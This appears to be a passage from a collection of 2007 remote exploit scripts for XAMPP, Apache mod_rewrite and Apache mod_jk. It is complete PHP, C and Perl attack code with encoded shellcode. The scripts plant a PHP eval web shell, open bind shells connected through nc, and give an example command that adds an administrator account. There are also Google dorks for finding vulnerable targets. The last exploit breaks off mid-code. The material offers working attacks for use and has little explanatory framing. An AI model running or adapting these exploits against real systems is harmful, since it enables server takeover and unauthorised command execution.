\x32\x5a\x4b\x79\x64\x55\x6b\x33\x64\x51\x34\x41\x 38\x30\x75\x4b\
\x55\x6e\x6b\x33\x6f\x44\x64\x46\x61\x7a\x4b\x32\x 46\x6e\x6b\x34\
\x4c\x42\x6b\x6e\x6b\x73\x6f\x77\x6c\x54\x41\x58\x 6b\x43\x33\x74\
\x6c\x6c\x4b\x4d\x59\x50\x6c\x74\x64\x75\x4c\x52\x 41\x6f\x33\x50\
\x31\x6b\x6b\x72\x44\x4c\x4b\x50\x43\x66\x50\x6c\x 4b\x33\x70\x64\
\x4c\x6c\x4b\x74\x30\x65\x4c\x4e\x4d\x4e\x6b\x53\x 70\x47\x78\x33\
\x6e\x51\x78\x4c\x4e\x52\x6e\x56\x6e\x58\x6c\x50\x 50\x59\x6f\x79\
\x46\x70\x66\x62\x73\x75\x36\x75\x38\x66\x53\x64\x 72\x42\x48\x53\
\x47\x32\x53\x50\x32\x71\x4f\x71\x44\x49\x6f\x48\x 50\x52\x48\x5a\
\x6b\x48\x6d\x6b\x4c\x65\x6b\x70\x50\x4b\x4f\x68\x 56\x61\x4f\x4e\
\x69\x4a\x45\x30\x66\x6e\x61\x78\x6d\x67\x78\x73\x 32\x42\x75\x52\
\x4a\x75\x52\x6b\x4f\x7a\x70\x61\x78\x6b\x69\x55\x 59\x6c\x35\x6e\
\x4d\x51\x47\x4b\x4f\x4e\x36\x70\x53\x50\x53\x56\x 33\x76\x33\x43\
\x73\x32\x73\x31\x53\x52\x73\x6b\x4f\x4a\x70\x70\x 68\x6f\x30\x6d\
\x78\x35\x50\x46\x61\x30\x66\x30\x68\x76\x64\x6c\x 42\x33\x56\x70\
\x53\x4e\x69\x78\x61\x4c\x55\x75\x38\x4a\x4c\x58\x 79\x4c\x6a\x73\
\x50\x53\x67\x6b\x4f\x6a\x76\x73\x5a\x72\x30\x73\x 61\x53\x65\x4b\
\x4f\x6a\x70\x52\x46\x31\x7a\x52\x44\x73\x56\x50\x 68\x51\x73\x50\
\x6d\x32\x4a\x62\x70\x51\x49\x47\x59\x6a\x6c\x6c\x 49\x4b\x57\x42\
\x4a\x73\x74\x6d\x59\x6d\x32\x35\x61\x6f\x30\x48\x 73\x4f\x5a\x6f\
\x65\x4c\x49\x39\x6d\x4b\x4e\x33\x72\x54\x6d\x6b\x 4e\x33\x72\x34\
\x6c\x6c\x4d\x50\x7a\x57\x48\x4e\x4b\x4c\x6b\x6c\x 6b\x71\x78\x32\
\x52\x6b\x4e\x6c\x73\x42\x36\x49\x6f\x73\x45\x65\x 78\x6b\x4f\x6e\
\x36\x71\x4b\x42\x77\x43\x62\x53\x61\x76\x31\x70\x 51\x30\x6a\x35\
\x51\x62\x71\x76\x31\x72\x75\x43\x61\x4b\x4f\x6e\x 30\x73\x58\x4e\
\x4d\x7a\x79\x37\x75\x38\x4e\x31\x43\x4b\x4f\x4a\x 76\x30\x6a\x39\
\x6f\x6b\x4f\x70\x37\x6b\x4f\x6e\x30\x45\x38\x39\x 77\x54\x39\x79\
\x56\x71\x69\x79\x6f\x53\x45\x56\x64\x69\x6f\x69\x 46\x6b\x4f\x62\
\x57\x6b\x4c\x4b\x4f\x6a\x70\x50\x68\x6a\x50\x6f\x 7a\x37\x74\x43\
\x6f\x72\x73\x4b\x4f\x6a\x76\x79\x6f\x38\x50\x63\
"'`\
HTTP/1.0\r\n\
Host: $host\r\n\r\n" | nc -vv $host 80
# [2007-04-07]
80 XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit
<?php
print_r('
---------------------------------------------------------------------------
XAMPP for Windows <= 1.6.0a adodb.php/mssql_connect() remote buffer overflow
proof-of-concept exploit
seh overwrite method / 2000 sp3 version
mail: retrog at alice dot it
site: http://retrogod.altervista.org
---------------------------------------------------------------------------
');
/*
http://sourceforge.net/project/showfiles.php?group_id=61776
this easy to install Apache / MySQL / PHP distribution for Windows
carries various (lots) test scripts vulnerable to sql injection, but
we have here another kind of injection, adodb.php lines 62-68:
...
include_once 'adodb/adodb-errorpear.inc.php';
include_once 'adodb/adodb.inc.php';
include_once 'adodb/tohtml.inc.php';
$db = ADONewConnection($_POST['dbserver']);
@$db->Connect($_POST['host'], $_POST['user'], $_POST['password'], $_POST['database']);
echo "<p><b>DBServer: $_POST[dbserver]</b><p>";
$result = $db->Execute("SELECT * FROM $_POST[table]");
...
mssql_connect() function is vulnerable to buffer overflow and
the host argument is totally unchecked. Also this shows a vulnerabilty in
ADODB library (which is in the include path, inside PEAR folder) in the
Connect method .
If you say that this should be not used for production purpose or
exposed to the outside world, try theese google dorks:
intitle:XAMPP intitle:windows intitle:version
intitle:XAMPP intitle:version intitle:1.6.0a +windows
note: I could use the INTO OUTFILE method through sql injection
to export some shell inside the /htdocs folder because we have FILE
privilege, but we have magic_quotes_gpc on here. This is instead
possbile through the PhpMyAdmin default user/password.
note ii: PHP version is 5.2.1
note iii: bof is possible because mssql extension is enabled
by default in php.ini
*/
if ($argc<2) {
print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host cmd OPTIONS
host: target server (ip/hostname)
cmd: a shell command
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
-S only send the second packet
Example:
php '.$argv[0].' localhost VER -P1.1.1.1:80
php '.$argv[0].' localhost NET USER sun tzu /ADD ^&^& NET LOCALGROUP
Administrators /ADD sun -p81 -S
---------------------------------------------------------------------------
');
die;
}
error_reporting(7);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) ';
function sendpacketii($packet,$want_out)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],(int)$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($want_out){
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) {
$html.=fread($ock,1);
}
}
}
fclose($ock);
}
$host=$argv[1];
$port=80;
$proxy="";
$cmd="";
$send_bof=true;
for ($i=2; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p")
and ($temp<>"-P")
and ($temp<>"-S")
){
$cmd.=" ".$argv[$i];
}
if ($temp=="-p")
{
$port=(int)str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-S")
{
$send_bof=false;
}
}
if ($proxy=='') {$p="";} else {$p='http://'.$host.':'.$port;}
//bad chars -> \x00,\x22,\x27,\x5c thoose affected by magic_quotes_gpc
//102 bytes execute command one by me...
//cmd.exe /c echo ^<?php eval($_SERVER[HTTP_C]);?^> > ./htdocs/xampp/s.php &
if ($send_bof){
$____scode=
"\xeb\x13\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4a\x53".
"\xbb\xca\x73\xe9\x77". //WinExec, kernel32.dll
"\xff\xd3\x31\xc0\xe8\xe8\xff\xff\xff\x63\x6d\x64".
"\x2e\x65\x78\x65\x20\x2f\x63\x20\x65\x63\x68\x6f".
"\x20\x5e\x3c\x3f\x70\x68\x70\x20\x65\x76\x61\x6c".
"\x28\x24\x5f\x53\x45\x52\x56\x45\x52\x5b\x48\x54".
"\x54\x50\x5f\x43\x5d\x29\x3b\x3f\x5e\x3e\x20\x3e".
"\x20\x2e\x2f\x68\x74\x64\x6f\x63\x73\x2f\x78\x61".
"\x6d\x70\x70\x2f\x73\x2e\x70\x68\x70\x20\x26\x20".
"\xff";
//some junk to make this adjustable for sp4
//eip = ecx
$eip="\x47\x30\xE9\x77"; //0x77E93047 pop ECX - pop - retbis kernel32.dll and further ja short
$jmp="\xeb\x8b\x90\x90"; //jmp short
$____suntzu=str_repeat("\x90",1932-strlen($____scode)).$____scode."\x90\x90\x90\x90\x90\x90\x90\x90".$jmp.$eip;
$data ="-----------------------------7d61bcd1f033e\r\n";
$data.="Content-Disposition: form-data; name=\"dbserver\";\r\n\r\n";
$data.="mssql\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n";
$data.="Content-Disposition: form-data; name=\"host\";\r\n\r\n";
$data.="$____suntzu\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n";
$data.="Content-Disposition: form-data; name=\"adodb\";\r\n\r\n";
$data.="submit\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n";
$data.="Content-Disposition: form-data; name=\"user\";\r\n\r\n";
$data.="1\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n";
$data.="Content-Disposition: form-data; name=\"password\";\r\n\r\n";
$data.="1\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n";
$data.="Content-Disposition: form-data; name=\"database\";\r\n\r\n";
$data.="1\r\n";
$data.="-----------------------------7d61bcd1f033e--\r\n";
$packet ="POST $p/xampp/adodb.php HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet,0);
sleep(2);
}
echo "cmd -> ".$cmd."\n";
$packet ="GET $p/xampp/s.php HTTP/1.0\r\n";
$packet.="C: error_reporting(E_ALL);set_time_limit(0);echo \"_delim_\";passthru(\$_SERVER[HTTP_CMD]);echo \"_delim_\";\r\n";
$packet.="CMD: $cmd\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet,1);
$out=explode("_delim_",$html);
echo $out[1];
?>
# [2007-04-15]
80 Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
/*
apache mod rewrite exploit (win32)
By: fabio/b0x (oc-192, old CoTS member)
Vuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded
Code: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003)
original exploit (http://enigmagroup.org/exploits/3680) only had a call back on 192.168.0.1, also
was a little buggy, so shellcode was rewriten, thanks to http://metasploit.com/
Usage: ./apache hostname rewrite_path
Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard
Example: ./apache 192.168.0.253 test
[+]Preparing payload
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Starting second stage...
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Connecting to shell
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Program Files\Apache Group\Apache2>exit
exit
[+]Owned
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define PORT 80
#define PORT2 4444
#define MAXDATASIZE 1024
char get[] = "/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90";
char shellcode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49"
"\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x 51\x5a\x6a\x41"
"\x58\x50\x30\x42\x30\x41\x6b\x41\x41\x51\x41\x32\x 41\x41\x32\x42"
"\x42\x42\x30\x42\x41\x58\x38\x41\x42\x50\x75\x7a\x 49\x4b\x58\x56"
"\x36\x73\x30\x43\x30\x75\x50\x70\x53\x66\x35\x70\x 56\x31\x47\x4c"
"\x4b\x50\x6c\x44\x64\x55\x48\x6c\x4b\x73\x75\x75\x 6c\x4c\x4b\x61"
"\x44\x73\x35\x63\x48\x35\x51\x4b\x5a\x6c\x4b\x50\x 4a\x37\x68\x6c"
"\x4b\x42\x7a\x77\x50\x37\x71\x4a\x4b\x6b\x53\x44\x 72\x30\x49\x6e"
"\x6b\x44\x74\x6e\x6b\x56\x61\x68\x6e\x54\x71\x39\x 6f\x6b\x4c\x70"
"\x31\x4b\x70\x6c\x6c\x67\x48\x6b\x50\x54\x34\x53\x 37\x6b\x71\x68"
"\x4f\x44\x4d\x73\x31\x78\x47\x38\x6b\x38\x72\x45\x 6b\x73\x4c\x31"
"\x34\x46\x74\x52\x55\x6b\x51\x6c\x4b\x63\x6a\x65\x 74\x56\x61\x7a"
"\x4b\x32\x46\x4c\x4b\x76\x6c\x70\x4b\x4e\x6b\x30\x 5a\x75\x4c\x67"
"\x71\x5a\x4b\x6e\x6b\x74\x44\x4e\x6b\x57\x71\x6b\x 58\x68\x6b\x76"
"\x62\x50\x31\x4b\x70\x33\x6f\x53\x6e\x31\x4d\x63\x 6b\x4b\x72\x65"
"\x58\x55\x50\x61\x4e\x31\x7a\x36\x50\x42\x79\x70\x 64\x4e\x6b\x74"
"\x59\x6e\x6b\x43\x6b\x44\x4c\x4c\x4b\x51\x4b\x77\x 6c\x4c\x4b\x35"
"\x4b\x6e\x6b\x31\x4b\x74\x48\x73\x63\x63\x58\x6c\x 4e\x70\x4e\x44"
"\x4e\x78\x6c\x79\x6f\x4b\x66\x4d\x59\x6f\x37\x4b\x 31\x78\x6c\x33"
"\x30\x77\x71\x73\x30\x47\x70\x36\x37\x53\x66\x51\x 43\x4d\x59\x69"
"\x75\x39\x78\x56\x47\x57\x70\x37\x70\x37\x70\x6e\x 70\x45\x51\x33"
"\x30\x37\x70\x4c\x76\x72\x39\x55\x48\x7a\x47\x6d\x 74\x45\x49\x54"
"\x30\x4d\x39\x38\x65\x77\x39\x4b\x36\x50\x49\x6c\x 64\x35\x4a\x52"
"\x50\x4f\x37\x6c\x64\x4c\x6d\x76\x4e\x4d\x39\x4b\x 69\x45\x59\x49"
"\x65\x4e\x4d\x78\x4b\x4a\x4d\x6b\x4c\x77\x4b\x31\x 47\x50\x53\x74"
"\x72\x61\x4f\x46\x53\x67\x42\x57\x70\x61\x4b\x6c\x 4d\x42\x6b\x75"
"\x70\x70\x51\x6b\x4f\x7a\x77\x4b\x39\x4b\x6f\x4f\x 79\x4f\x33\x4e"
"\x6d\x71\x65\x52\x34\x53\x5a\x53\x37\x30\x59\x50\x 51\x66\x33\x4b"
"\x4f\x55\x64\x4c\x4f\x6b\x4f\x66\x35\x43\x34\x50\x 59\x6e\x69\x47"
"\x74\x6c\x4e\x6a\x42\x58\x72\x54\x6b\x64\x67\x72\x 74\x39\x6f\x76"
"\x57\x6b\x4f\x50\x55\x44\x70\x30\x31\x4b\x70\x50\x 50\x30\x50\x50"
"\x50\x32\x70\x77\x30\x46\x30\x53\x70\x70\x50\x49\x 6f\x63\x65\x66"
"\x4c\x4b\x39\x4f\x37\x30\x31\x6b\x6b\x33\x63\x71\x 43\x42\x48\x54"
"\x42\x63\x30\x76\x71\x63\x6c\x4c\x49\x6d\x30\x52\x 4a\x32\x30\x32"
"\x70\x36\x37\x59\x6f\x52\x75\x71\x34\x50\x53\x70\x 57\x4b\x4f\x72"
"\x75\x44\x68\x61\x43\x62\x74\x33\x67\x59\x6f\x63\x 65\x67\x50\x4c"
"\x49\x38\x47\x6d\x51\x5a\x4c\x53\x30\x36\x70\x53\x 30\x33\x30\x4e"
"\x69\x4b\x53\x53\x5a\x43\x30\x72\x48\x53\x30\x34\x 50\x33\x30\x33"
"\x30\x50\x53\x76\x37\x6b\x4f\x36\x35\x74\x58\x6e\x 61\x4a\x4c\x67"
"\x70\x35\x54\x33\x30\x63\x30\x49\x6f\x78\x53\x41";
char finish[]= "HTTP/1.0\r\nHost: ";
char payload2[]=
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x18"
"\xd9\x03\x3a\x83\xeb\xfc\xe2\xf4\xe4\xb3\xe8\x77\x f0\x20\xfc\xc5"
"\xe7\xb9\x88\x56\x3c\xfd\x88\x7f\x24\x52\x7f\x3f\x 60\xd8\xec\xb1"
"\x57\xc1\x88\x65\x38\xd8\xe8\x73\x93\xed\x88\x3b\x f6\xe8\xc3\xa3"
"\xb4\x5d\xc3\x4e\x1f\x18\xc9\x37\x19\x1b\xe8\xce\x 23\x8d\x27\x12"
"\x6d\x3c\x88\x65\x3c\xd8\xe8\x5c\x93\xd5\x48\xb1\x 47\xc5\x02\xd1"
"\x1b\xf5\x88\xb3\x74\xfd\x1f\x5b\xdb\xe8\xd8\x5e\x 93\x9a\x33\xb1"
"\x58\xd5\x88\x4a\x04\x74\x88\x7a\x10\x87\x6b\xb4\x 56\xd7\xef\x6a"
"\xe7\x0f\x65\x69\x7e\xb1\x30\x08\x70\xae\x70\x08\x 47\x8d\xfc\xea"
"\x70\x12\xee\xc6\x23\x89\xfc\xec\x47\x50\xe6\x5c\x 99\x34\x0b\x38"
"\x4d\xb3\x01\xc5\xc8\xb1\xda\x33\xed\x74\x54\xc5\x ce\x8a\x50\x69"
"\x4b\x8a\x40\x69\x5b\x8a\xfc\xea\x7e\xb1\x12\x67\x 7e\x8a\x8a\xdb"
"\x8d\xb1\xa7\x20\x68\x1e\x54\xc5\xce\xb3\x13\x6b\x 4d\x26\xd3\x52"
"\xbc\x74\x2d\xd3\x4f\x26\xd5\x69\x4d\x26\xd3\x52\x fd\x90\x85\x73"
"\x4f\x26\xd5\x6a\x4c\x8d\x56\xc5\xc8\x4a\x6b\xdd\x 61\x1f\x7a\x6d"
"\xe7\x0f\x56\xc5\xc8\xbf\x69\x5e\x7e\xb1\x60\x57\x 91\x3c\x69\x6a"
"\x41\xf0\xcf\xb3\xff\xb3\x47\xb3\xfa\xe8\xc3\xc9\x b2\x27\x41\x17"
"\xe6\x9b\x2f\xa9\x95\xa3\x3b\x91\xb3\x72\x6b\x48\x e6\x6a\x15\xc5"
"\x6d\x9d\xfc\xec\x43\x8e\x51\x6b\x49\x88\x69\x3b\x 49\x88\x56\x6b"
"\xe7\x09\x6b\x97\xc1\xdc\xcd\x69\xe7\x0f\x69\xc5\x e7\xee\xfc\xea"
"\x93\x8e\xff\xb9\xdc\xbd\xfc\xec\x4a\x26\xd3\x52\x e8\x53\x07\x65"
"\x4b\x26\xd5\xc5\xc8\xd9\x03\x3a";
int main(int argc, char *argv[])
{
int sockfd, numbytes;
char buf[MAXDATASIZE];
struct hostent *he;
struct sockaddr_in their_addr;
printf(" Exploit: apache mod rewrite exploit (win32)\n"
" By: fabio/b0x (oc-192, old CoTS member)\n"
"Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\n"
);
if (argc != 3) {
printf(" Usage: ./apache hostname rewrite_path\n");
exit(1);
}
printf("\n[+]Preparing payload\n");
char payload[748];
sprintf(payload,"GET /%s%s%s%s%s\r\n\r\n\0",argv[2],get,shellcode,finish,argv[1]);
printf("[+]Connecting...\n");
if ((he=gethostbyname(argv[1])) == NULL) {
printf("[-]Cannot resolv hostname...\n");
exit(1);
}
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-]Socket error...\n");
exit(1);
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(PORT);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero);
if (connect(sockfd, (struct sockaddr *)&their_addr,
sizeof(struct sockaddr)) == -1) {
printf("[-]Unable to connect\n");
exit(1);
}
printf("[+]Connected\n[+]Sending...\n");
if (send(sockfd, payload, strlen(payload), 0) == -1){
printf("[-]Unable to send\n");
exit(1);
}
printf("[+]Sent\n");
close(sockfd);
printf("[+]Starting second stage...\n");
sleep(3);
printf("[+]Connecting...\n");
if ((he=gethostbyname(argv[1])) == NULL) {
printf("[-]Cannot resolv hostname...\n");
exit(1);
}
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-]Socket error...\n");
exit(1);
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(PORT2);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero);
if (connect(sockfd, (struct sockaddr *)&their_addr,
sizeof(struct sockaddr)) == -1) {
printf("[-]Unable to connect\n");
exit(1);
}
printf("[+]Connected\n[+]Sending...\n");
if (send(sockfd, payload2, strlen(payload2), 0) == -1){
printf("[-]Unable to send\n");
exit(1);
}
printf("[+]Sent\n[+]Connecting to shell\n");
close(sockfd);
sleep(3);
int exec;
char what[1024];
sprintf(what," nc -w 10 %s 4445",argv[1]);
exec=system(what);
if (exec!=0){
printf("[-]Not hacked\n");
} else {
printf("[+]Owned\n");
}
exit(1);
}
// [2007-05-26]
80 Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
# Apache w/ mod_jk Remote Exploit
# by eliteboy
use IO::Socket;
print "***ELiTEBOY*PRESENTZ***APACHE*MOD_JK*REMOTE*EXPLOI T***\n";
$target = $ARGV[1];
if (($#ARGV != 1) || ($target < 1) || ($target > 3)) {
print "Usage: modjkx.pl <hostname> <targettype>\n";
print "1.\tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.20\n"
."\tDebian 3.1/4.0*Apache 2.2.4/2.2.3&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19\n";
print "2.\tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.19\n"
."\tDebian 3.1 Sarge*Apache 2.2.4&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19\n";
print "3.\tFreeBSD5.4-RELEASE *** Apache 2.2.4 mod_jk-1.2.20/mod_jk-1.2.19\n";
exit;
}
$port = 80;
### lnx metasploit bindshell code port 2007
my $lnx_shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x 51\x5a\x6a\x49".
"\x58\x50\x30\x42\x31\x42\x41\x6b\x41\x41\x59\x41\x 32\x41\x41\x32".
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x69\x 79\x37\x41\x6b".
"\x6b\x63\x63\x57\x33\x72\x73\x73\x5a\x76\x62\x32\x 4a\x55\x36\x51".
"\x48\x4e\x79\x4e\x69\x38\x61\x6a\x6d\x4f\x70\x7a\x 36\x77\x33\x30".
"\x52\x42\x46\x31\x78\x46\x67\x38\x57\x30\x66\x50\x 53\x6d\x59\x4b".
"\x51\x32\x4a\x63\x56\x70\x58\x50\x50\x50\x51\x50\x 56\x6f\x79\x4b".
"\x51\x7a\x6d\x4f\x70\x48\x30\x65\x36\x4b\x61\x4d\x 33\x38\x4d\x4b".
"\x30\x72\x72\x50\x52\x56\x36\x42\x63\x6b\x39\x68\x 61\x6e\x50\x33".
"\x56\x68\x4d\x6b\x30\x6d\x43\x70\x6a\x33\x32\x66\x 39\x6c\x70\x37".
"\x4f\x58\x4d\x6f\x70\x42\x69\x31\x69\x39\x69\x6e\x 50\x74\x4b\x46".
"\x32\x32\x48\x56\x4f\x46\x4f\x64\x33\x62\x48\x35\x 38\x56\x4f\x42".
"\x42\x30\x69\x50\x6e\x6b\x39\x4a\x43\x56\x32\x73\x 63\x4b\x39\x48".
"\x61\x68\x4d\x6d\x50\x49";
### bsd metasploit bindshell code port 5555
my $bsd_shellcode =
"\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x 59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x 59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x 59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x 59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x 59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\x a4\xff\xff\xff".
"\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x 49\x49\x49\x49".
"\x49\x49\x51\x5a\x6a\x42\x58\x50\x30\x42\x30\x42\x 6b\x42\x41\x52".
"\x42\x41\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x 38\x42\x42\x50".
"\x75\x59\x79\x53\x5a\x31\x71\x33\x68\x4d\x49\x50\x 52\x32\x48\x76".
"\x70\x43\x32\x55\x45\x6f\x43\x6c\x49\x68\x61\x36\x 32\x51\x52\x36".
"\x32\x62\x62\x52\x72\x50\x6a\x66\x70\x5a\x6d\x4f\x 70\x4f\x69\x6f".
"\x63\x50\x51\x32\x73\x73\x62\x50\x6a\x72\x48\x36\x 38\x38\x4d\x4f".
"\x70\x4c\x70\x51\x7a\x68\x4d\x6f\x70\x62\x72\x62\x 73\x50\x52\x58".
"\x30\x65\x4e\x5a\x6d\x4d\x50\x6c\x57\x32\x4a\x66\x 62\x31\x49\x41".
"\x7a\x41\x4a\x52\x78\x46\x31\x30\x57\x32\x71\x4a\x 6d\x4d\x50\x77".
"\x39\x51\x69\x6c\x35\x30\x50\x32\x48\x66\x4f\x56\x 4f\x32\x53\x62".
"\x48\x52\x48\x76\x4f\x70\x62\x32\x49\x50\x6e\x4d\x 59\x5a\x43\x52".
"\x70\x72\x74\x56\x33\x70\x53\x6e\x50\x47\x4b\x38\x 4d\x6b\x30\x42".
"A" x 100;
$alignment = 4127;
$|=1;
if ($target eq 1) {
$shellcode = $lnx_shellcode;
$addr = 0xbffff060;
}
if ($target eq 2) {
$shellcode = $lnx_shellcode;
$addr = 0xbfffef4c;
}
if ($target eq 3) {
$shellcode = $bsd_shellcode;
$addr = 0xbfbfe5d5;
}
$offset = pack('l', $addr);
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $port,
Proto => 'tcp');
$a = "A" x ($alignment-4-length($shellcode)) . $shellcode . $offset;
print $sock "GET /$a HTTP/1.0\r\n\r\n";
while(<$sock>) {
print;
}
# [2007-06-22]
80 Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
/*
**
** Fedora Core 5,6 (exec-shield) based
** Apache Tomcat Connector (mod_jk) remote overflow exploit
** by Xpl017Elz
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt
**
** Reference: http://www.securityfocus.com/bid/22791
** vendor: http://tomcat.apache.org/
**
** eliteboy's exploit (SUSE, Debian, FreeBSD):
** http://www.enigmagroup.org/exploits/4093
**
** Nicob <nicob[at]nicob.net>'s exploit (Win32):
** http://downloads.securityfocus.com/vulnerabilities/exploits/apache_modjk_overflow.rb
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <[email protected]>.
** My World: http://x82.inetcop.org
**
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>
#ifdef __linux__
#include <getopt.h>
#endif
#define MAP_URI_TO_WORKER_1_FC5 0x080474bc /* (0x2040),(0x201c) */
#define MAP_URI_TO_WORKER_1_FC6 0x080476a4 /* (0x2040),(0x201c) */
#define MAP_URI_TO_WORKER_2 0x82828282
#define MAP_URI_TO_WORKER_3 0x08048014
/* parody */
#define HOST_PARAM "0x82-apache-mod_jk.c" /* Host */
#define DEFAULT_CMDZ "uname -a;id;echo 'hehe, its GOBBLES style!';export TERM=vt100;exec bash -i\n"
#define PADDING_1 'A'
#define PADDING_2 'B'
#define PADDING_3 'C'
#define RET_ADDR_INC (0x2000)
#define SH_PORT 8282
char library_shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
/* linux_ia32_bind - LPORT=8282 Size=108 Encoder=PexFnstenvSub http://metasploit.com */
"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xe0"
"\x2c\x54\x7f\x83\xeb\xfc\xe2\xf4\xd1\xf7\x07\x3c\x b3\x46\x56\x15"
"\x86\x74\xcd\xf6\x01\xe1\xd4\xe9\xa3\x7e\x32\x17\x c0\x76\x32\x2c"
"\x69\xcd\x3e\x19\xb8\x7c\x05\x29\x69\xcd\x99\xff\x 50\x4a\x85\x9c"
"\x2d\xac\x06\x2d\xb6\x6f\xdd\x9e\x50\x4a\x99\xff\x 73\x46\x56\x26"
"\x50\x13\x99\xff\xa9\x55\xad\xcf\xeb\x7e\x3c\x50\x cf\x5f\x3c\x17"
"\xcf\x4e\x3d\x11\x69\xcf\x06\x2c\x69\xcd\x99\xff";
struct {
int num;
char *type;
int ret_count;
